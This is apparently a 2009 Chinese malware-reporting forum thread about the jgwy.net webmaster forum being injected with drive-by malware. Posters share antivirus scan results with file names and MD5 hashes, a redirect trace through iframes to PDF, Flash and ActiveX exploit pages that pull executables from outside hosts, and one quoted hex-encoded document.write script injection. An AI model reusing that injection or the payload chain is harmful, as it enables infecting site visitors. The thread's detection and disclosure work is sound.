金光站长论坛被挂马 by mouse_0232

显示全部楼层 · 发表于 2009-5-21 19:13:01

hxxp ://www.jgwy.net
看看有毒吗？
大蜘蛛不报

[ 本帖最后由 mouse_0232 于 2009-5-21 19:34 编辑 ]

显示全部楼层 · 发表于 2009-5-21 19:20:01

威胁报告

已发现威胁总数: 93

Small-whitebg-red 病毒 (这是什么?)

已发现威胁: 67
这是示例:
威胁名称: Downloader
文件名: C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\W96RIBA9\ok[1].exe
签名 (MD5): 8c797135e3e23eb9fb39f38ab2a8364e
位置: http://www.jgwy.net/thread-16827223-1-1.html

威胁名称: Downloader
文件名: C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\W96RIBA9\ok[1].exe
签名 (MD5): 8c797135e3e23eb9fb39f38ab2a8364e
位置: http://jgwy.net/

威胁名称: Downloader
文件名: C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\MH25YLE5\ok[1].exe
签名 (MD5): 8c797135e3e23eb9fb39f38ab2a8364e
位置: http://www.jgwy.net/space-uid-177245.html

威胁名称: Downloader
文件名: C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\G1Q9SRO7\ok[1].exe
签名 (MD5): 8c797135e3e23eb9fb39f38ab2a8364e
位置: http://www.jgwy.net/forumdisplay ... =&orderby=views

威胁名称: Downloader
文件名: C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\MH25YLE5\ok[1].exe
签名 (MD5): 8c797135e3e23eb9fb39f38ab2a8364e
位置: http://www.jgwy.net/space-username-bmw2701.html

威胁名称: Downloader
文件名: C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\GZKDIZWD\ok[1].exe
签名 (MD5): 8c797135e3e23eb9fb39f38ab2a8364e
位置: http://www.jgwy.net/post.php?act ... d=125&special=3

威胁名称: Infostealer.Gampass
文件名: C:\WINDOWS\system32\L7.exe
签名 (MD5): 527fca5d1bf7520545b0af04b7f50f1e
位置: http://www.jgwy.net/thread-16821599-2-1.html

威胁名称: Downloader
文件名: C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\MH25YLE5\ok[1].exe
签名 (MD5): 8c797135e3e23eb9fb39f38ab2a8364e
位置: http://www.jgwy.net/forumdisplay ... mp;orderby=dateline

威胁名称: Downloader
文件名: C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\MH25YLE5\ok[1].exe
签名 (MD5): 8c797135e3e23eb9fb39f38ab2a8364e
位置: http://www.jgwy.net/index.php?gid=23

威胁名称: Downloader
文件名: C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\GZKDIZWD\ok[1].exe
签名 (MD5): 8c797135e3e23eb9fb39f38ab2a8364e
位置: http://www.jgwy.net/thread-16827031-1-1.html

Small-whitebg-red 可疑应用程序 (这是什么?)

已发现威胁: 14
这是示例:
威胁名称: 可疑进程
进程名称: C:\WINDOWS\132046_3801155x.exe
位置: http://www.jgwy.net/thread-16817785-1-1.html

威胁名称: 可疑进程
进程名称: C:\WINDOWS\124125_3801155x.exe
位置: http://www.jgwy.net/forumdisplay.php?fid=105&sid=X6JDFj

威胁名称: 可疑进程
进程名称: C:\WINDOWS\123921_1279360868x.exe
位置: http://www.jgwy.net/thread-16827034-1-1.html

威胁名称: 可疑进程
进程名称: C:\WINDOWS\177796_-1440392196x.exe
位置: http://www.jgwy.net/thread-16827111-1-1.html

威胁名称: 可疑进程
进程名称: C:\WINDOWS\120203_3801155x.exe
位置: http://www.jgwy.net/bank.php

威胁名称: 可疑进程
进程名称: C:\WINDOWS\123062_3801155x.exe
位置: http://www.jgwy.net/post.php?act ... d=125&special=1

威胁名称: 可疑进程
进程名称: C:\WINDOWS\134343_3801155x.exe
位置: http://www.jgwy.net/thread-16827309-1-1.html

威胁名称: 可疑进程
进程名称: C:\WINDOWS\122531_3801155x.exe
位置: http://www.jgwy.net/forum-125-8.html

威胁名称: 可疑进程
进程名称: C:\WINDOWS\124687_-167967934x.exe
位置: http://www.jgwy.net/topicadmin.p ... =yes&nopost=yes

威胁名称: 直接链接到可疑进程
位置: http://www.jgwy.net/forumdisplay.php?fid=125&sid=X6JDFj

Small-whitebg-red 启发式病毒 (这是什么?)

已发现威胁: 12
这是示例:
威胁名称: Suspicious.MH690
文件名: C:\WINDOWS\system32\L1.exe
签名 (MD5): 7615f7fe85aca4eeb3e7e1d70edf2b76
位置: http://www.jgwy.net/viewthread.p ... 2503&sid=X6JDFj

威胁名称: Suspicious.MH690
文件名: C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\W96RIBA9\L4[1].exe
签名 (MD5): 982e7434d19ac0540a070fba9b3ea4df
位置: http://www.jgwy.net/my.php?item= ... =yes&sid=X6JDFj

威胁名称: Suspicious.MH690
文件名: C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\W96RIBA9\L8[1].exe
签名 (MD5): eb5d9185b8faf31c7b2699e4840457f5
位置: http://www.jgwy.net/thread-16824303-2-1.html

威胁名称: Suspicious.MH690
文件名: C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\GZKDIZWD\L1[1].exe
签名 (MD5): 47225f1b5a0de37f7b8be790b1fc4e3b
位置: http://www.jgwy.net/space-uid-177245.html

威胁名称: Suspicious.MH690
文件名: C:\WINDOWS\system32\L8.exe
签名 (MD5): eb5d9185b8faf31c7b2699e4840457f5
位置: http://www.jgwy.net/forum-91-1.html

威胁名称: Suspicious.MH690
文件名: C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\G1Q9SRO7\L3[1].exe
签名 (MD5): 851d872f86c8792ecd3b87ed3bc99970
位置: http://jgwy.net/

威胁名称: Suspicious.MH690
文件名: C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\GZKDIZWD\L3[1].exe
签名 (MD5): 851d872f86c8792ecd3b87ed3bc99970
位置: http://www.jgwy.net/thread-16827035-1-1.html

威胁名称: Suspicious.MH690
文件名: C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\MH25YLE5\L9[1].exe
签名 (MD5): effff27f32f62fd658b6566d84f3b875
位置: http://www.jgwy.net/redirect.php?tid=16827310&goto=lastpost

威胁名称: Suspicious.MH690
文件名: C:\WINDOWS\system32\L9.exe
签名 (MD5): effff27f32f62fd658b6566d84f3b875
位置: http://www.jgwy.net/space-username-xyecho.html

威胁名称: 直接链接到 Suspicious.MH690
位置: http://www.jgwy.net/forumdisplay.php?fid=125&sid=X6JDFj

挂的蛮多的

显示全部楼层 · 发表于 2009-5-21 19:21:43

AVG
hxxp://www.jgwy.net/include/js/common.js?1iS
Virus found HTML/Framer

显示全部楼层 · 发表于 2009-5-21 19:28:44

Log is generated by FreShow.
[wide]http://www.jgwy.net/
[script]http://www.jgwy.net/include/js/common.js?1iS
      [script]http://www.jgwy.net/include/js/([^]*?)
      [script]http://www.crcf.org.cn/logo.gif
         [frame]http://2bxbx2.3322.org/a/a6a.htm?22
            [frame]http://2bxbx2.3322.org/a/163.htm
                  [frame]http://2bxbx2.3322.org/a/ggqm.htm
                     [object]http://yes9821.3322.org/web/activex.exe
                  [script]http://2bxbx2.3322.org/a/js.js
                     [frame]http://2bxbx2.3322.org/a/gg14.htm
                        [script]http://2bxbx2.3322.org/a/14.js
                              [object]http://exe316.com/web/xp.exe
                        [script]http://2bxbx2.3322.org/a/15.js
                        [script]http://2bxbx2.3322.org/a/16.js
                     [frame]http://2bxbx2.3322.org/a/ggfl.htm
                     [frame]http://2bxbx2.3322.org/a/ggff.htm
                     [frame]http://2bxbx2.3322.org/a/ggvod.htm
                     [frame]http://2bxbx2.3322.org/a/e.htm
                     [frame]http://2bxbx2.3322.org/a/ggbb.htm
                     [frame]http://2bxbx2.3322.org/a/ggr.htm
                  [frame]http://2bxbx2.3322.org/a/p.htm
                     [frame]http://2bxbx2.3322.org/a/p.pdf
                        [object]http://5l2o8.com/web/3.exe
            [script]http://2bxbx2.3322.org/a/\"http:\/\/js.tongji.cn.yahoo.com\/1106391\/ystat.js\"
            [script]http://s37.cnzz.com/stat.php?id=1408289&web_id=1408289
[script]http://a01.insenz.com/adv?sid=1376&gid=&fid=0&tid=0&uid=0&random=4AWw

[ 本帖最后由 mouse_0232 于 2009-5-21 19:33 编辑 ]

显示全部楼层 · 发表于 2009-5-21 19:36:08

小a也报鸟

显示全部楼层 · 发表于 2009-5-21 19:36:15

document.write('<script src=http://%77%77%77%2E%63%72%63%66%2E%6F%72%67%2E%63%6E/%6C%6F%67%6F%2E%67%69%66></script>')

显示全部楼层 · 发表于 2009-5-21 19:45:00

nod32竟然也不报！

显示全部楼层 · 发表于 2009-5-21 19:55:33

瑞星报

显示全部楼层 · 发表于 2009-5-21 20:05:15

呵呵,有pdf了再补充个flash的
关于:hxxp://2bxbx2.3322.org/a/ggff.htm解密的日志(全体输出 -  4):

Level  0>http://2bxbx2.3322.org/a/ggff.htm
Level  1>http://2bxbx2.3322.org/a/ff.js
Level  2>http://2bxbx2.3322.org/a/2222222222.swf  ● ----->>>>http://exe316.com/web/xp.exe
Level  2>http://2bxbx2.3322.org/a/1111111111.swf  ● ----->>>>http://exe316.com/web/xp.exe

网页分析：250662772

显示全部楼层 · 发表于 2009-5-21 20:30:26

这两个swf解出来都是http://5l2o8.com/web/xp.exe 可能是拿过来用.地址没改.

[已鉴定] 金光站长论坛被挂马 by mouse_0232

瑞星主动拦截，实时监控报毒

[已鉴定] 金光站长论坛 被挂马 by mouse_0232

瑞星主动拦截，实时监控报毒

[已鉴定] 金光站长论坛被挂马 by mouse_0232